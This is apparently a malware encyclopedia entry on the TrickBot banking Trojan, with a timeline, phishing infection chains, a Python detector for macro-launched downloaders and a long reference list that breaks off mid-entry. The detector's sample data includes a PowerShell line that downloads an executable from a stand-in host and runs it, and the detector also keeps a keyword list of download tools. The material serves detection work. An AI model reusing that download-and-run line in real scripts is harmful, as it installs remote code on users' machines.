win.trickbot

TrickBot

aka: Trickster, TheTrick, TrickLoader

Actor(s): TA505, WIZARD SPIDER


A banking Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects and operational tactics. It is modular, with modules including VNC and a SOCKS5 proxy, and uses SSL/TLS for C2 communication.

- Q4 2016 - Detected in the wild
- Oct 2016 - First public report
- 2017 - TrickBot primarily uses Necurs as the vehicle for installs
- Jan 2018 - XMRig (Monero) miner module
- Feb 2018 - Bitcoin theft
- Mar 2018 - Unfinished ransomware module
- Q3/Q4 2018 - TrickBot starts being spread through Emotet

Infection Vector
1. Phish > Link to MS Office document > Macro enabled > Downloader > TrickBot
2. Phish > Attached MS Office document > Macro enabled > Downloader > TrickBot
3. Phish > Attached MS Office document > Macro enabled > TrickBot installed directly by the macro
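As an added example (not code from this page or from any of the reports cited below), the following Python detection logic flags the three chains above in process-creation telemetry: an Office application spawning a script host whose command line fetches something from the network (vectors 1 and 2), that script host then launching an executable from a user-writable directory, and an Office application starting an executable from such a directory itself (vector 3). The Sysmon-style event fields, the process-name and command-line markers, the directory list and the sample events are all constructed assumptions, not indicators taken from the page.

```python
"""Flag the phish -> macro-enabled Office document -> downloader -> TrickBot
chain in process-creation telemetry (Sysmon Event ID 1 style fields).

Added example: not TrickBot code and not from any report cited on this page.
The event layout, process names, command-line markers and the sample chain
are constructed assumptions about what a macro downloader typically looks like.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line fragments that usually mean "fetch something over the network".
DOWNLOAD_HINTS = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|-urlcache|bitsadmin\s+/transfer|net\.webclient", re.I)
# Directories a macro can write to without elevation; dropped payloads land here.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|programdata|public|downloads)\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, label) findings sorted by pid.

    Assumes pids are unique inside the event window. On real Sysmon data key on
    ProcessGuid/ParentProcessGuid instead, because Windows reuses pids.
    """
    by_pid = {e.pid: e for e in events}
    labels = {}
    # Pass 1: direct children of Office processes, i.e. the macro's first action.
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in OFFICE_APPS:
            continue
        child = basename(e.image)
        if child in SCRIPT_HOSTS:
            # Vectors 1 and 2: the macro hands off to a script host that downloads.
            labels[e.pid] = ("office_spawns_downloader" if DOWNLOAD_HINTS.search(e.cmdline)
                             else "office_spawns_script_host")
        elif USER_WRITABLE.search(e.image):
            # Vector 3: the macro drops the bot and starts it itself.
            labels[e.pid] = "office_spawns_payload_from_user_dir"
    # Pass 2: a flagged downloader running what it fetched.
    for e in events:
        if labels.get(e.ppid) == "office_spawns_downloader" and USER_WRITABLE.search(e.image):
            labels[e.pid] = "downloader_launches_payload"
    return sorted(labels.items())


def sample_events():
    """Constructed telemetry: one benign Excel print job and two malicious chains."""
    u = r"C:\Users\alice"
    office = r"C:\Program Files\Microsoft Office\root\Office16"
    tmp_exe = u + r"\AppData\Local\Temp\a.exe"
    ps_cmd = ("powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'http://downloader.example.invalid/a.png','" + tmp_exe + "');"
              "Start-Process '" + tmp_exe + "'\"")
    return [
        ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
        # Vector 2: attached document; the macro calls PowerShell to fetch and run the bot.
        ProcEvent(200, 100, office + r"\WINWORD.EXE",
                  '"WINWORD.EXE" /n "' + u + r'\Downloads\invoice_2041.doc"'),
        ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps_cmd),
        ProcEvent(400, 300, tmp_exe, "a.exe"),
        # Benign: Excel printing through the spooler helper; Office parent, harmless child.
        ProcEvent(500, 100, office + r"\EXCEL.EXE", "EXCEL.EXE"),
        ProcEvent(600, 500, r"C:\Windows\splwow64.exe", "splwow64.exe"),
        # Vector 3: the macro writes the bot under %APPDATA% and starts it directly.
        ProcEvent(700, 100, office + r"\WINWORD.EXE", "WINWORD.EXE"),
        ProcEvent(800, 700, u + r"\AppData\Roaming\payload.exe", "payload.exe"),
    ]


if __name__ == "__main__":
    for pid, label in detect(sample_events()):
        print(pid, label)
```

The benign Excel/splwow64 pair is in the sample to show that "Office spawned a child" alone is too noisy; the signal comes from what the child is (a script host with download markers) or where it runs from (a user-writable directory). On live Sysmon data, key the parent lookup on ProcessGuid rather than pid, and treat "office_spawns_script_host" without a download marker as a lower-severity hit worth triaging rather than an alert on its own.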

References (each entry: date | source | author(s), followed by its BibTeX record and the families/actors the reference is tagged with)
2020-06-22 | CERT-FR | CERT-FR
@techreport{certfr:20200622:volution:fba1cfa, author = {CERT-FR}, title = {{Évolution De L'activité du Groupe Cybercriminel TA505}}, date = {2020-06-22}, institution = {CERT-FR}, url = {https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf}, language = {French}, urldate = {2020-06-24} } Évolution De L'activité du Groupe Cybercriminel TA505 (English: Evolution of the Activity of the Cybercriminal Group TA505)
Amadey AndroMut Bart Clop Dridex FlawedGrace Gandcrab Get2 GlobeImposter Jaff Locky Marap Philadephia Ransom QuantLoader Scarab Ransomware SDBbot ServHelper Silence tRat TrickBot
2020-06-22 | Sentinel LABS | Joshua Platt, Jason Reaves
@online{platt:20200622:inside:b381dd5, author = {Joshua Platt and Jason Reaves}, title = {{Inside a TrickBot Cobalt Strike Attack Server}}, date = {2020-06-22}, organization = {Sentinel LABS}, url = {https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/}, language = {English}, urldate = {2020-06-23} } Inside a TrickBot Cobalt Strike Attack Server
Cobalt Strike TrickBot
2020-06-17 | Youtube (Red Canary) | Erika Noerenberg, Matt Graeber, Adam Pennington, David Kaplan
@online{noerenberg:20200617:attck:934d73c, author = {Erika Noerenberg and Matt Graeber and Adam Pennington and David Kaplan}, title = {{ATT&CK® Deep Dive: Process Injection}}, date = {2020-06-17}, organization = {Youtube (Red Canary)}, url = {https://redcanary.com/resources/webinars/deep-dive-process-injection/}, language = {English}, urldate = {2020-06-19} } ATT&CK® Deep Dive: Process Injection
ISFB Ramnit TrickBot
2020-06-15 | Fortinet | Val Saengphaibul, Fred Gutierrez
@online{saengphaibul:20200615:global:5c4be18, author = {Val Saengphaibul and Fred Gutierrez}, title = {{Global Malicious Spam Campaign Using Black Lives Matter as a Lure}}, date = {2020-06-15}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure}, language = {English}, urldate = {2020-06-16} } Global Malicious Spam Campaign Using Black Lives Matter as a Lure
TrickBot
2020-06-12 | Hornetsecurity | Security Lab
@online{lab:20200612:trickbot:2bf54ef, author = {Security Lab}, title = {{Trickbot Malspam Leveraging Black Lives Matter as Lure}}, date = {2020-06-12}, organization = {Hornetsecurity}, url = {https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/}, language = {English}, urldate = {2020-07-01} } Trickbot Malspam Leveraging Black Lives Matter as Lure
TrickBot
2020-06-11 | Cofense | Jason Meurer
@online{meurer:20200611:all:cc2e167, author = {Jason Meurer}, title = {{All You Need Is Text: Second Wave}}, date = {2020-06-11}, organization = {Cofense}, url = {https://cofenselabs.com/all-you-need-is-text-second-wave/}, language = {English}, urldate = {2020-06-12} } All You Need Is Text: Second Wave
TrickBot
2020-06-02 | Lastline Labs | James Haughom, Stefano Ortolani
@online{haughom:20200602:evolution:3286d87, author = {James Haughom and Stefano Ortolani}, title = {{Evolution of Excel 4.0 Macro Weaponization}}, date = {2020-06-02}, organization = {Lastline Labs}, url = {https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/}, language = {English}, urldate = {2020-06-03} } Evolution of Excel 4.0 Macro Weaponization
Agent Tesla DanaBot ISFB TrickBot Zloader
2020-05-28 | Palo Alto Networks Unit 42 | Brad Duncan
@online{duncan:20200528:goodbye:87a0245, author = {Brad Duncan}, title = {{Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module}}, date = {2020-05-28}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/}, language = {English}, urldate = {2020-05-29} } Goodbye Mworm, Hello Nworm: TrickBot Updates Propagation Module
TrickBot
2020-05-21 | Intel 471 | Intel 471
@online{471:20200521:brief:048d164, author = {Intel 471}, title = {{A brief history of TA505}}, date = {2020-05-21}, organization = {Intel 471}, url = {https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/}, language = {English}, urldate = {2020-05-23} } A brief history of TA505
AndroMut Bart Dridex FlawedAmmyy FlawedGrace Gandcrab Get2 GlobeImposter Jaff Kegotip Locky Necurs Philadephia Ransom Pony QuantLoader Rockloader SDBbot ServHelper Shifu Snatch TrickBot
2020-05-19 | AlienLabs | Ofer Caspi
@online{caspi:20200519:trickbot:50c2a51, author = {Ofer Caspi}, title = {{TrickBot BazarLoader In-Depth}}, date = {2020-05-19}, organization = {AlienLabs}, url = {https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth}, language = {English}, urldate = {2020-05-20} } TrickBot BazarLoader In-Depth
Anchor BazarBackdoor TrickBot
2020-05-14 | SentinelOne | Jason Reaves
@online{reaves:20200514:deep:1ee83b6, author = {Jason Reaves}, title = {{Deep Dive Into TrickBot Executor Module “mexec”: Reversing the Dropper Variant}}, date = {2020-05-14}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/}, language = {English}, urldate = {2020-05-18} } Deep Dive Into TrickBot Executor Module “mexec”: Reversing the Dropper Variant
TrickBot
2020-04-14 | Intel 471 | Intel 471
@online{471:20200414:understanding:ca95961, author = {Intel 471}, title = {{Understanding the relationship between Emotet, Ryuk and TrickBot}}, date = {2020-04-14}, organization = {Intel 471}, url = {https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/}, language = {English}, urldate = {2020-04-26} } Understanding the relationship between Emotet, Ryuk and TrickBot
Emotet Ryuk TrickBot
2020-04-09 | Zscaler | Atinderpal Singh, Abhay Yadav
@online{singh:20200409:trickbot:9db52c2, author = {Atinderpal Singh and Abhay Yadav}, title = {{TrickBot Emerges with a Few New Tricks}}, date = {2020-04-09}, organization = {Zscaler}, url = {https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks}, language = {English}, urldate = {2020-07-01} } TrickBot Emerges with a Few New Tricks
TrickBot
2020-04-08 | SentinelOne | Jason Reaves
@online{reaves:20200408:deep:87b83bb, author = {Jason Reaves}, title = {{Deep Dive Into TrickBot Executor Module “mexec”: Hidden “Anchor” Bot Nexus Operations}}, date = {2020-04-08}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/}, language = {English}, urldate = {2020-04-13} } Deep Dive Into TrickBot Executor Module “mexec”: Hidden “Anchor” Bot Nexus Operations
Anchor TrickBot
2020-04-07 | SecurityIntelligence | Ole Villadsen
@online{villadsen:20200407:itg08:b0b782d, author = {Ole Villadsen}, title = {{ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework}}, date = {2020-04-07}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/}, language = {English}, urldate = {2020-04-13} } ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework
More_eggs Anchor TrickBot
2020-03-31 | FireEye | Van Ta, Aaron Stephens
@online{ta:20200331:its:632dfca, author = {Van Ta and Aaron Stephens}, title = {{It’s Your Money and They Want It Now - The Cycle of Adversary Pursuit}}, date = {2020-03-31}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html}, language = {English}, urldate = {2020-04-06} } It’s Your Money and They Want It Now - The Cycle of Adversary Pursuit
Ryuk TrickBot
2020-03-31 | Cisco Talos | Chris Neal
@online{neal:20200331:trickbot:dcf5314, author = {Chris Neal}, title = {{Trickbot: A primer}}, date = {2020-03-31}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2020/03/trickbot-primer.html}, language = {English}, urldate = {2020-04-01} } Trickbot: A primer
TrickBot
2020-03-30 | Intezer | Michael Kajiloti
@online{kajiloti:20200330:fantastic:c01db60, author = {Michael Kajiloti}, title = {{Fantastic payloads and where we find them}}, date = {2020-03-30}, organization = {Intezer}, url = {https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them}, language = {English}, urldate = {2020-04-07} } Fantastic payloads and where we find them
Dridex Emotet ISFB TrickBot
2020-03-25 | Wilbur Security | JW
@online{jw:20200325:trickbot:17b0dc3, author = {JW}, title = {{Trickbot to Ryuk in Two Hours}}, date = {2020-03-25}, organization = {Wilbur Security}, url = {https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/}, language = {English}, urldate = {2020-03-26} } Trickbot to Ryuk in Two Hours
Cobalt Strike Ryuk TrickBot
2020-03-18 | Bitdefender | Liviu Arsene, Radu Tudorica, Alexandru Maximciuc, Cristina Vatamanu
@techreport{arsene:20200318:new:2d895da, author = {Liviu Arsene and Radu Tudorica and Alexandru Maximciuc and Cristina Vatamanu}, title = {{New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong}}, date = {2020-03-18}, institution = {Bitdefender}, url = {https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf}, language = {English}, urldate = {2020-03-19} } New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong
TrickBot
2020-03-09 | Fortinet | Xiaopeng Zhang
@online{zhang:20200309:new:ff60491, author = {Xiaopeng Zhang}, title = {{New Variant of TrickBot Being Spread by Word Document}}, date = {2020-03-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html}, language = {English}, urldate = {2020-04-26} } New Variant of TrickBot Being Spread by Word Document
TrickBot
2020-03-05 | Microsoft | Microsoft Threat Protection Intelligence Team
@online{team:20200305:humanoperated:d90a28e, author = {Microsoft Threat Protection Intelligence Team}, title = {{Human-operated ransomware attacks: A preventable disaster}}, date = {2020-03-05}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/}, language = {English}, urldate = {2020-03-06} } Human-operated ransomware attacks: A preventable disaster
Dharma DoppelPaymer Dridex EternalPetya Gandcrab Hermes LockerGoga MegaCortex MimiKatz REvil RobinHood Ryuk SamSam TrickBot WannaCryptor
2020-03-04 | CrowdStrike | CrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-03-04} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze Necurs Nokki Outlook Backdoor Phobos Ransomware Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot vidar Winnti ANTHROPOID SPIDER Anunak APT39 BlackTech BuhTrap Charming Kitten CLOCKWORD SPIDER DOPPEL SPIDER Gamaredon Group Judgment Panda Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER Pinchy Spider Pirate Panda Salty Spider SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER
2020-03-04 | Bleeping Computer | Lawrence Abrams
@online{abrams:20200304:ryuk:31f2ce0, author = {Lawrence Abrams}, title = {{Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection}}, date = {2020-03-04}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/}, language = {English}, urldate = {2020-03-09} } Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection
Ryuk TrickBot
2020-03-03 | PWC UK | PWC UK
@techreport{uk:20200303:cyber:1f1eef0, author = {PWC UK}, title = {{Cyber Threats 2019:A Year in Retrospect}}, date = {2020-03-03}, institution = {PWC UK}, url = {https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf}, language = {English}, urldate = {2020-03-03} } Cyber Threats 2019:A Year in Retrospect
KevDroid MESSAGETAP magecart AndroMut Cobalt Strike CobInt Crimson RAT DNSpionage Dridex Dtrack Emotet FlawedAmmyy FlawedGrace FriedEx Gandcrab Get2 GlobeImposter Grateful POS ISFB Kazuar LockerGoga Nokki QakBot Ramnit REvil Rifdoor RokRAT Ryuk shadowhammer ShadowPad Shifu Skipper StoneDrill Stuxnet TrickBot Winnti ZeroCleare
2020-02-28 | Morphisec | Michael Gorelik
@online{gorelik:20200228:trickbot:678683b, author = {Michael Gorelik}, title = {{Trickbot Delivery Method Gets a New Upgrade Focusing on Windows 10}}, date = {2020-02-28}, organization = {Morphisec}, url = {https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows}, language = {English}, urldate = {2020-03-03} } Trickbot Delivery Method Gets a New Upgrade Focusing on Windows 10
TrickBot
2020-02-26 | SentinelOne | Jason Reaves
@online{reaves:20200226:revealing:2c3fc63, author = {Jason Reaves}, title = {{Revealing the Trick | A Deep Dive into TrickLoader Obfuscation}}, date = {2020-02-26}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/}, language = {English}, urldate = {2020-02-27} } Revealing the Trick | A Deep Dive into TrickLoader Obfuscation
TrickBot
2020-02-19 | FireEye | FireEye
@online{fireeye:20200219:mtrends:193613a, author = {FireEye}, title = {{M-Trends 2020}}, date = {2020-02-19}, organization = {FireEye}, url = {https://content.fireeye.com/m-trends/rpt-m-trends-2020}, language = {English}, urldate = {2020-02-20} } M-Trends 2020
Cobalt Strike Grateful POS LockerGoga QakBot TrickBot
2020-02-18 | Sophos Labs | Luca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020-02-13 | Qianxin | Qi Anxin Threat Intelligence Center
@techreport{center:20200213:report:146d333, author = {Qi Anxin Threat Intelligence Center}, title = {{APT Report 2019}}, date = {2020-02-13}, institution = {Qianxin}, url = {https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf}, language = {English}, urldate = {2020-02-27} } APT Report 2019
Chrysaor Exodus Dacls elf.vpnfilter DNSRat Griffon KopiLuwak More_eggs SQLRat AppleJeus BONDUPDATER Agent.BTZ Anchor AndroMut AppleJeus BOOSTWRITE Brambul Carbanak Cobalt Strike Dacls DistTrack DNSpionage Dtrack ELECTRICFISH FlawedAmmyy FlawedGrace Get2 Grateful POS HOPLIGHT Imminent Monitor RAT jason Joanap KerrDown KEYMARBLE Lambert LightNeuron LoJax MiniDuke PolyglotDuke PowerRatankba Rising Sun SDBbot ServHelper Snatch Stuxnet TinyMet tRat TrickBot Volgmer X-Agent Zebrocy
2020-02-10 | Malwarebytes | Adam Kujawa, Wendy Zamora, Jérôme Segura, Thomas Reed, Nathan Collier, Jovi Umawing, Chris Boyd, Pieter Arntz, David Ruiz
@techreport{kujawa:20200210:2020:3fdaf12, author = {Adam Kujawa and Wendy Zamora and Jérôme Segura and Thomas Reed and Nathan Collier and Jovi Umawing and Chris Boyd and Pieter Arntz and David Ruiz}, title = {{2020 State of Malware Report}}, date = {2020-02-10}, institution = {Malwarebytes}, url = {https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf}, language = {English}, urldate = {2020-02-13} } 2020 State of Malware Report
magecart Emotet QakBot REvil Ryuk TrickBot WannaCryptor
2020-01-30 | Morphisec | Arnold Osipov
@online{osipov:20200130:trickbot:da5c80d, author = {Arnold Osipov}, title = {{Trickbot Trojan Leveraging a New Windows 10 UAC Bypass}}, date = {2020-01-30}, organization = {Morphisec}, url = {https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass}, language = {English}, urldate = {2020-02-03} } Trickbot Trojan Leveraging a New Windows 10 UAC Bypass
TrickBot
2020-01-30 | Bleeping Computer | Lawrence Abrams
@online{abrams:20200130:trickbot:22db786, author = {Lawrence Abrams}, title = {{TrickBot Uses a New Windows 10 UAC Bypass to Launch Quietly}}, date = {2020-01-30}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/}, language = {English}, urldate = {2020-02-03} } TrickBot Uses a New Windows 10 UAC Bypass to Launch Quietly
TrickBot
2020-01-29 | Bleeping Computer | Lawrence Abrams
@online{abrams:20200129:malware:920dc7e, author = {Lawrence Abrams}, title = {{Malware Tries to Trump Security Software With POTUS Impeachment}}, date = {2020-01-29}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/}, language = {English}, urldate = {2020-02-03} } Malware Tries to Trump Security Software With POTUS Impeachment
TrickBot
2020-01-27 | T-Systems | T-Systems
@techreport{tsystems:20200127:vorlufiger:39dc989, author = {T-Systems}, title = {{Vorläufiger forensischer Abschlussbericht zur Untersuchung des Incidents beim Berliner Kammergericht}}, date = {2020-01-27}, institution = {T-Systems}, url = {https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf}, language = {German}, urldate = {2020-01-28} } Vorläufiger forensischer Abschlussbericht zur Untersuchung des Incidents beim Berliner Kammergericht (English: Preliminary final forensic report on the investigation of the incident at the Berlin Kammergericht)
Emotet TrickBot
2020-01-23 | Bleeping Computer | Lawrence Abrams
@online{abrams:20200123:trickbot:5ca7827, author = {Lawrence Abrams}, title = {{TrickBot Now Steals Windows Active Directory Credentials}}, date = {2020-01-23}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/}, language = {English}, urldate = {2020-01-27} } TrickBot Now Steals Windows Active Directory Credentials
TrickBot
2020-01-17 | (no organization given) | Ken Sajo, Yasuhiro Takeda, Yusuke Niwa
@techreport{sajo:20200117:battle:2b146f5, author = {Ken Sajo and Yasuhiro Takeda and Yusuke Niwa}, title = {{Battle Against Ursnif Malspam Campaign targeting Japan}}, date = {2020-01-17}, institution = {}, url = {https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf}, language = {English}, urldate = {2020-01-17} } Battle Against Ursnif Malspam Campaign targeting Japan
Cutwail ISFB TrickBot UrlZone
2020-01-16 | Bleeping Computer | Lawrence Abrams
@online{abrams:20200116:trickbot:ed6fdb3, author = {Lawrence Abrams}, title = {{TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection}}, date = {2020-01-16}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/}, language = {English}, urldate = {2020-01-20} } TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
TrickBot
2020-01-10 | CSIS | CSIS
@techreport{csis:20200110:threat:7454f36, author = {CSIS}, title = {{Threat Matrix H1 2019}}, date = {2020-01-10}, institution = {CSIS}, url = {https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf}, language = {English}, urldate = {2020-01-22} } Threat Matrix H1 2019
Gustuff magecart Emotet Gandcrab Ramnit TrickBot
2020-01-09 | SentinelOne | Vitali Kremez, Joshua Platt, Jason Reaves
@online{kremez:20200109:toptier:4f8de90, author = {Vitali Kremez and Joshua Platt and Jason Reaves}, title = {{Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets}}, date = {2020-01-09}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/}, language = {English}, urldate = {2020-01-13} } Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets
TrickBot WIZARD SPIDER
2020 | Secureworks | SecureWorks
@online{secureworks:2020:gold:d8faa3e, author = {SecureWorks}, title = {{GOLD ULRICK}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-ulrick}, language = {English}, urldate = {2020-05-23} } GOLD ULRICK
Empire Downloader Ryuk TrickBot WIZARD SPIDER
2020 | Secureworks | SecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot Lunar Spider
2020 | Secureworks | SecureWorks
@online{secureworks:2020:gold:21c4d39, author = {SecureWorks}, title = {{GOLD BLACKBURN}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-blackburn}, language = {English}, urldate = {2020-05-23} } GOLD BLACKBURN
Dyre TrickBot
2019-12-12 | FireEye | Chi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-09 | Palo Alto Networks Unit 42 | Bryan Lee, Brittany Ash, Mike Harbison
@online{lee:20191209:trickbot:48d9da3, author = {Bryan Lee and Brittany Ash and Mike Harbison}, title = {{TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks}}, date = {2019-12-09}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/}, language = {English}, urldate = {2020-01-22} } TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
TrickBot
2019-11-22 | Palo Alto Networks Unit 42 | Brad Duncan
@online{duncan:20191122:trickbot:e14933b, author = {Brad Duncan}, title = {{Trickbot Updates Password Grabber Module}}, date = {2019-11-22}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/}, language = {English}, urldate = {2020-01-22} } Trickbot Updates Password Grabber Module
TrickBot
2019-11-13 | CrowdStrike | Jen Ayers, Jason Rivera
@techreport{ayers:20191113:through:70cc3b3, author = {Jen Ayers and Jason Rivera}, title = {{Through the Eyes of the Adversary}}, date = {2019-11-13}, institution = {CrowdStrike}, url = {https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf}, language = {English}, urldate = {2020-03-22} } Through the Eyes of the Adversary
TrickBot CLOCKWORD SPIDER
2019-11-08 | Palo Alto Networks Unit 42 | Brad Duncan
@online{duncan:20191108:wireshark:f37b983, author = {Brad Duncan}, title = {{Wireshark Tutorial: Examining Trickbot Infections}}, date = {2019-11-08}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/}, language = {English}, urldate = {2020-01-06} } Wireshark Tutorial: Examining Trickbot Infections
TrickBot
2019-11-06 | Heise Security | Thomas Hungenberg
@online{hungenberg:20191106:emotet:1605954, author = {Thomas Hungenberg}, title = {{Emotet, Trickbot, Ryuk – ein explosiver Malware-Cocktail}}, date = {2019-11-06}, organization = {Heise Security}, url = {https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html}, language = {German}, urldate = {2020-01-06} } Emotet, Trickbot, Ryuk – ein explosiver Malware-Cocktail (English: Emotet, Trickbot, Ryuk: an explosive malware cocktail)
Emotet Ryuk TrickBot
2019-10-29 | SneakyMonkey Blog | SneakyMonkey
